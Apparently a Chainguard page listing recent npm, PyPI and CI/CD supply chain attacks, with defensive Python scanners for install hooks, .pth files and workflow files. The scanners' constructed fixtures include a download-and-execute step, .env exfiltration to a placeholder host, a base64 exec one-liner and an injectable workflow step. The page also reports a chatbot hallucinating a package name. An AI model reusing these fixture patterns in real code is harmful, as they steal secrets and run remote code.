AI Threat Protection
Your engineering team loves AI, and so do the bad guys
Executing a sophisticated supply chain attack used to require time, resources, and a skilled team. AI has sharply lowered all three barriers. Attacks now move at machine speed, and businesses can't keep up — except the ones protected by Chainguard.
The latest supply chain attacks, and how Chainguard customers are safe
Apr 30, 2026
intercom-client
A compromised GitHub account (nhur) was used to trigger an automated CI publish workflow from a now-deleted branch, pushing v7.0.4 with two malicious files. A preinstall hook downloaded and executed an unverified Bun binary, which ran an 11.7 MB obfuscated payload that harvested developer keys and credentials.
Install-Time Script
Apr 29, 2026
tanstack
An attacker registered the unscoped tanstack package name on npm, brand-squatting the legitimate @tanstack/* packages, which collectively see hundreds of millions of downloads a month. Four malicious versions were pushed in a 27-minute window, each carrying a postinstall script that silently collected .env, .env.local, and .env.production files and exfiltrated them to an attacker-controlled Svix ingest endpoint.
Typosquatting
Apr 29, 2026
SAP’s Cloud Application Programming Model Libraries
Attackers compromised an SAP contributor's GitHub account and used it to push a modified workflow to a non-main branch, extracting an npm OIDC token to publish malicious versions without provenance. All four packages carried a weaponized preinstall hook that downloaded the Bun runtime and executed an 11MB obfuscated second-stage payload. Stolen data was exfiltrated to public GitHub repos created on the victim's own account with the description "A Mini Shai-Hulud has Appeared."
Install-Time Script
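The intercom-client, tanstack and SAP entries above share one mechanism: an npm lifecycle hook (preinstall/postinstall) that runs the moment the package is installed, and the hook either fetches and executes a binary or reads secret files and sends them out. The same pattern appears in the CanisterWorm and Shai-Hulud entries further down. The script below is an added example of the check a practitioner would run over a package before installing it; it is not Chainguard's, npm's or any listed project's code. It inspects each hook command and any local JS file the command invokes, and scores what it finds with a few behavioural heuristics. The package manifests, file contents and .invalid hostnames are constructed for the example.

```python
"""Audit npm lifecycle hooks for download-and-execute and secret-harvesting behaviour.

Added illustration, not Chainguard's, npm's or any named project's code. The
package manifests and script files below are constructed; the domains are
.invalid placeholders and the regexes are heuristics, not malware signatures.
"""
import json
import os
import re
from typing import Dict, List, Tuple

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Behaviours that are rarely legitimate inside an install hook.
PATTERNS = {
    "download-and-execute": re.compile(
        r"\b(curl|wget|Invoke-WebRequest)\b.*?(\bchmod\b|\bbash\b|\bsh\b|\bbun\b|\./)"),
    "secret-file-read": re.compile(
        r"(?<!process)(?<!meta)\.env(\.\w+)?\b|\.npmrc\b|id_rsa\b|\.aws/credentials"),
    "network-send": re.compile(
        r"\b(https?\.request|fetch|axios\.(post|put)|XMLHttpRequest|net\.connect)\s*\("),
    "obfuscation-or-eval": re.compile(r"\beval\s*\(|new Function\s*\(|\batob\s*\(|base64"),
}
# "node foo.js" / "bun ./scripts/x.mjs": the file the hook actually runs.
SCRIPT_REF = re.compile(r"\b(?:node|bun)\s+(\S+\.(?:c?js|mjs))")
RANK = {"low": 0, "medium": 1, "high": 2}


def audit_package(package_json: str, files: Dict[str, str]) -> List[dict]:
    """One finding per lifecycle hook, after scanning the hook command and any
    local JS file it invokes. `files` maps tarball-relative paths to contents."""
    scripts = json.loads(package_json).get("scripts", {})
    findings = []
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        texts, labels = [cmd], set()
        for ref in SCRIPT_REF.findall(cmd):
            path = os.path.normpath(ref)
            if path in files:
                texts.append(files[path])
            else:
                labels.add("missing-script-file")  # hook runs a file the tarball lacks
        for label, rx in PATTERNS.items():
            if any(rx.search(t) for t in texts):
                labels.add(label)
        if ("download-and-execute" in labels or "obfuscation-or-eval" in labels
                or {"secret-file-read", "network-send"} <= labels):
            risk = "high"
        elif labels:
            risk = "medium"
        else:
            risk = "low"  # an install hook with no hits still deserves a look
        findings.append({"hook": hook, "command": cmd,
                         "labels": sorted(labels), "risk": risk})
    return findings


# Constructed samples: (package.json text, {path: file content}).
SAMPLES: Dict[str, Tuple[str, Dict[str, str]]] = {
    "benign-build": (
        json.dumps({"name": "benign-build",
                    "scripts": {"postinstall": "node scripts/build.js"}}),
        {"scripts/build.js": "const fs = require('fs');\n"
                             "fs.mkdirSync('dist', { recursive: true });\n"},
    ),
    "bootstrap-binary": (  # preinstall fetches a runtime and runs a second stage
        json.dumps({"name": "bootstrap-binary",
                    "scripts": {"preinstall": "node setup.js"}}),
        {"setup.js": "const { execSync } = require('child_process');\n"
                     "execSync('curl -fsSL https://dl.example.invalid/rt.zip -o rt.zip "
                     "&& unzip rt.zip && chmod +x rt && ./rt run stage2.js');\n"},
    ),
    "env-harvester": (  # postinstall reads .env files and POSTs them out
        json.dumps({"name": "env-harvester",
                    "scripts": {"postinstall": "node ./index.js"}}),
        {"index.js": "const fs = require('fs'); const https = require('https');\n"
                     "const loot = ['.env', '.env.local', '.env.production']\n"
                     "  .filter(fs.existsSync).map(f => fs.readFileSync(f, 'utf8'));\n"
                     "const req = https.request({ host: 'c.example.invalid', method: 'POST' });\n"
                     "req.end(JSON.stringify(loot));\n"},
    ),
    "dangling-hook": (  # install hook points at a file missing from the tarball
        json.dumps({"name": "dangling-hook",
                    "scripts": {"install": "node lib/hidden.js"}}),
        {},
    ),
}


def audit_all() -> Dict[str, str]:
    """Highest risk level per sample; a real scanner would walk node_modules."""
    return {name: max((f["risk"] for f in audit_package(pj, files)),
                      key=RANK.__getitem__)
            for name, (pj, files) in SAMPLES.items()}


if __name__ == "__main__":
    for name, risk in audit_all().items():
        print(f"{risk:6s} {name}")
```

To run this against a real package, fetch the tarball without installing it (for example `npm pack <name>@<version>`, which downloads but does not run hooks), unpack it, and feed package.json plus the unpacked files to `audit_package`. The cheaper control is to stop hooks from running at all: `ignore-scripts=true` in `.npmrc` (or `npm install --ignore-scripts`) and then rebuild the handful of native packages that genuinely need them.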
Apr 24, 2026
elementary-data
An attacker exploited a GitHub Actions script injection flaw via a malicious PR comment, hijacking the CI/CD pipeline to forge a signed release. The backdoored v0.23.3 contained a .pth file that stole developer credentials, cloud keys, and API tokens. Live for ~12 hours.
Source code manipulation
Mar 31, 2026
Axios
A North Korean threat actor built a social engineering campaign to compromise a maintainer of axios, gaining access to his npm account. Two malicious versions introduced a hidden post-install dependency that dropped a cross-platform RAT on macOS, Windows, and Linux. Live for ~3 hours.
Backdoored package
Mar 27, 2026
Telnyx
TeamPCP used stolen PyPI credentials to publish two malicious versions with no corresponding source on GitHub. A three-stage payload acted as a RAT, exfiltrating credentials disguised within a WAV audio file. Live for ~6 hours.
Backdoored package
Mar 24, 2026
LiteLLM
TeamPCP used PyPI credentials stolen via the Trivy breach to publish two backdoored versions. A hidden .pth file, which Python executes automatically at interpreter startup, harvested SSH keys, cloud credentials, and Kubernetes configs before exfiltrating them to an attacker-controlled domain. Live ~40 minutes.
Backdoored package
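Both the elementary-data and the LiteLLM entries rely on a .pth file, and the reason that works is a documented CPython behaviour: when the interpreter starts, site.py reads every .pth file in its site-packages directories, and any line beginning with "import " is passed to exec() rather than treated as a path. No import of the backdoored package is needed; opening a Python shell is enough. The script below is an added example of the audit a practitioner would run on a suspect environment; it is not code from LiteLLM, elementary-data or Chainguard. It lists the executable lines in each .pth file and flags those calling into process spawning, networking, decoding or dynamic execution. The sample .pth contents are constructed, and the call list is a heuristic that will also surface legitimate hooks (virtualenv's `_virtualenv.pth`, setuptools' `distutils-precedence.pth`), which is why unflagged executable lines are still reported at "review" level.

```python
"""List the .pth lines that CPython executes at interpreter startup and flag the
ones that look like a dropper.

Added illustration, not LiteLLM's, elementary-data's or Chainguard's code. The
sample .pth contents are constructed; the call list is a heuristic.
"""
import re
import site
from pathlib import Path
from typing import Dict, List, Optional

# site.py treats a .pth line starting with "import " or "import\t" as code and
# exec()s it; "#" lines are comments and everything else is a sys.path entry.
EXEC_PREFIX = ("import ", "import\t")

# Names that have no business in a startup hook (process spawning, network,
# decoding and dynamic execution).
SUSPICIOUS = re.compile(
    r"\b(exec|eval|compile|subprocess|os\.system|os\.popen|urllib|requests|"
    r"socket|base64|zlib|marshal|codecs\.decode|ctypes)\b")
ENCODED = re.compile(r"\\x[0-9a-fA-F]{2}|[A-Za-z0-9+/]{40,}={0,2}")


def executable_lines(text: str) -> List[str]:
    """The lines of a .pth file that will run, in file order."""
    return [ln for ln in text.splitlines() if ln.startswith(EXEC_PREFIX)]


def audit_pth_text(name: str, text: str) -> List[Dict]:
    """One finding per executable line; "high" if it calls something suspicious."""
    findings = []
    for ln in executable_lines(text):
        reasons = [f"calls {m}" for m in sorted(set(SUSPICIOUS.findall(ln)))]
        if ENCODED.search(ln):
            reasons.append("encoded blob")
        if len(ln) > 200:
            reasons.append(f"{len(ln)}-char one-liner")
        findings.append({"file": name, "line": ln, "reasons": reasons,
                         "level": "high" if reasons else "review"})
    return findings


def audit_site_packages(dirs: Optional[List[str]] = None) -> List[Dict]:
    """Scan every *.pth in the interpreter's site directories (or in `dirs`)."""
    if dirs is None:
        dirs = list(getattr(site, "getsitepackages", list)())
        dirs.append(site.getusersitepackages())
    findings = []
    for d in dirs:
        if not Path(d).is_dir():
            continue
        for p in sorted(Path(d).glob("*.pth")):
            try:
                findings.extend(audit_pth_text(str(p), p.read_text(errors="replace")))
            except OSError:
                continue
    return findings


# Constructed sample files.
SAMPLE_PTH = {
    "mypkg.pth": "/opt/mypkg/lib\n# a path entry and a comment: nothing executes\n",
    "_virtualenv.pth": "import _virtualenv\n",  # legitimate, but it does run code
    "zzz_telemetry.pth": "import base64, subprocess; "
                         "exec(base64.b64decode('aW1wb3J0IG9z').decode())\n",
}


def audit_samples() -> Dict[str, List[str]]:
    """Level of every executable line in each constructed sample."""
    return {name: [f["level"] for f in audit_pth_text(name, text)]
            for name, text in SAMPLE_PTH.items()}


if __name__ == "__main__":
    for name, levels in audit_samples().items():
        print(f"{name}: {levels or 'no executable lines'}")
    for f in audit_site_packages():
        print(f["level"], f["file"], f["reasons"] or "", f["line"][:80])
```

Run it from the interpreter you suspect (it scans that interpreter's own site directories), and note that a freshly pip-installed package can drop a .pth file without ever being imported, so the scan belongs in the image build or the CI job that installs dependencies, not only in incident response.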
Mar 20, 2026
CanisterWorm
Using npm tokens stolen in the Trivy compromise, TeamPCP published malicious versions of 140+ packages whose post-install scripts deployed a self-propagating worm. The C2 was hosted on the Internet Computer (ICP) blockchain, making it resistant to conventional takedowns.
Install-Time Script
Mar 19, 2026
Trivy
TeamPCP used compromised credentials to force-push 75 of 76 version tags in trivy-action so that they pointed at credential-stealing malware, and replaced every tag in setup-trivy. The attack also pushed malicious Trivy Docker images (v0.69.5, v0.69.6). The payload harvested API tokens, cloud credentials, SSH keys, and Kubernetes configs from CI/CD runners.
CI/CD Hijacking
Jan 27, 2026
dYdX
Attackers used compromised developer accounts to publish trojanized versions of dYdX client libraries on both npm and PyPI. The npm payload stole wallet seed phrases and device fingerprints. The PyPI payload added a RAT beaconing to a C2 server every 10 seconds.
Backdoored package
Jan 17, 2026
sympy-dev
A bad actor published a package named sympy-dev that cloned SymPy's description verbatim, deceiving 1,100+ developers. The modified library deployed an XMRig cryptominer that only triggered when specific polynomial routines were called, evading detection for 5 days.
Typosquatting
Sep 14, 2025
Shai-Hulud & Sha1-Hulud
Wave 1 (Sep 2025): Phished maintainer credentials were used to publish worm-style malicious packages to npm that drained crypto wallets and stole secrets.
Wave 2 (Nov 2025): Stolen bot credentials deployed pre-install script malware across 25,000+ repos, publishing secrets to public GitHub repos within 72 hours.
Install-Time Script
Sep 08, 2025
chalk/debug
A single maintainer was phished via a fake npm 2FA reset email. The attacker published malicious versions of 18 packages that injected a crypto drainer targeting Bitcoin, Solana, and Ethereum by rewriting HTTP responses and hooking MetaMask wallet interactions.
Backdoored package
May 07, 2025
discordpydebug
A malicious package posing as a Discord bot error-logging utility hid a RAT that used outbound HTTP polling to bypass firewalls. It communicated with a C2 server, enabling file read/write, shell command execution, and credential theft. It sat undetected on PyPI for over three years.
Typosquatting
Mar 14, 2025
tj-actions/changed-files
Attackers retroactively modified all version tags to reference a malicious commit, exposing CI/CD secrets in workflow logs. Over 23,000 repositories were affected. Leaked secrets included GitHub PATs, npm tokens, and private RSA keys.
CI/CD Hijacking
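Two of the CI/CD entries on this page, Trivy and tj-actions/changed-files, worked because git tags are mutable: a workflow that says `uses: some/action@v1` re-resolves that tag on every run, so whoever can move the tag chooses the code that executes on the runner. The elementary-data entry exploited the other classic workflow weakness, interpolating attacker-controlled event text (a PR comment) straight into a `run:` step, where GitHub expands `${{ }}` before the shell ever sees the script. The scanner below is an added example of the two checks a practitioner would put in front of every workflow file; it is not Chainguard's, tj-actions', Trivy's or elementary's code. It is a line-based YAML walk rather than a full parser so that it runs with no dependencies; the workflow it scans is constructed, and the 40-hex commit SHA in it is a placeholder rather than a real action revision.

```python
"""Flag GitHub Actions workflows that pin actions to mutable refs or splice
attacker-controlled event data into `run:` shell steps.

Added illustration, not Chainguard's, tj-actions', Trivy's or elementary's code.
The workflow below is constructed; the 40-hex commit SHA in it is a placeholder.
"""
import re
from typing import Dict, List

USES = re.compile(r"^\s*-?\s*uses:\s*([\w.-]+/[\w./-]+)@(\S+)")
FULL_SHA = re.compile(r"^[0-9a-f]{40}$")
RUN_KEY = re.compile(r"^(\s*)(-\s+)?run:")
# Event fields an outside contributor can write; interpolating them with ${{ }}
# into a run step pastes their text into the shell script before it executes.
TAINTED = re.compile(
    r"\$\{\{\s*github\.(event\.(issue\.(title|body)|comment\.body|review\.body|"
    r"review_comment\.body|discussion\.(title|body)|head_commit\.message|"
    r"pull_request\.(title|body|head\.(ref|label)))|head_ref)\b[^}]*\}\}")


def audit_workflow(text: str) -> List[Dict]:
    """Return findings with 1-based line numbers, in file order."""
    findings = []
    run_indent = None  # column of the `run:` key whose block scalar we are inside
    for no, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        indent = len(line) - len(line.lstrip())
        if run_indent is not None and indent <= run_indent:
            run_indent = None  # a dedent closes the run block
        m = USES.match(line)
        if m and not FULL_SHA.match(m.group(2)):
            findings.append({"line": no, "kind": "mutable-ref",
                             "detail": f"{m.group(1)}@{m.group(2)}"})
            continue
        m = RUN_KEY.match(line)
        if m:
            run_indent = len(m.group(1)) + len(m.group(2) or "")
        if m or run_indent is not None:
            t = TAINTED.search(line)
            if t:
                findings.append({"line": no, "kind": "script-injection",
                                 "detail": t.group(0)})
    return findings


# Constructed workflow: one mutable ref, one SHA pin, one unsafe and one safe
# use of the PR title, and a comment-triggered step of the elementary-data shape.
SAMPLE_WORKFLOW = """name: ci
on: [pull_request, issue_comment]
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: actions/checkout@0123456789abcdef0123456789abcdef01234567
      - name: echo title (unsafe)
        run: echo "${{ github.event.pull_request.title }}"
      - name: echo title (safe)
        env:
          TITLE: ${{ github.event.pull_request.title }}
        run: |
          echo "$TITLE"
      - name: comment trigger (unsafe)
        run: |
          if [[ "${{ github.event.comment.body }}" == *"/release"* ]]; then
            ./release.sh
          fi
"""


if __name__ == "__main__":
    for f in audit_workflow(SAMPLE_WORKFLOW):
        print(f"line {f['line']:3d}  {f['kind']:17s}  {f['detail']}")
```

The safe step in the sample shows the fix for injection: pass the event field through `env:` and read it as a quoted shell variable, so its contents are data rather than script. The fix for tag mutation is the SHA pin on the second checkout line: a commit hash cannot be moved the way a tag can, and a trailing `# v4.x` comment keeps the pin readable. The scanner only looks inside `run:` steps; `actions/github-script` inputs and composite-action inputs deserve the same scrutiny.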
May 28, 2024
huggingface-cli
A security researcher discovered that ChatGPT repeatedly hallucinated a package called huggingface-cli (instead of huggingface_hub[cli]) when asked how to upload models to Hugging Face. He registered the name on PyPI as a proof-of-concept. Within three months, it had 30,000+ downloads, including from a Hugging Face-owned project. A malicious actor could have embedded any payload.
Typosquatting
Related resources
Whitepaper
98% less malware: The data behind a safer open source supply chain
Read now
Blog Post
Introducing Chainguard Repository: A unified experience for secure-by-default open source artifacts
Read now
Blog Post
How does Chainguard prevent malware in Chainguard Libraries?
Read now
Blog Post
This Shit is Hard: Building hardened PyTorch wheels with upstream parity
Read now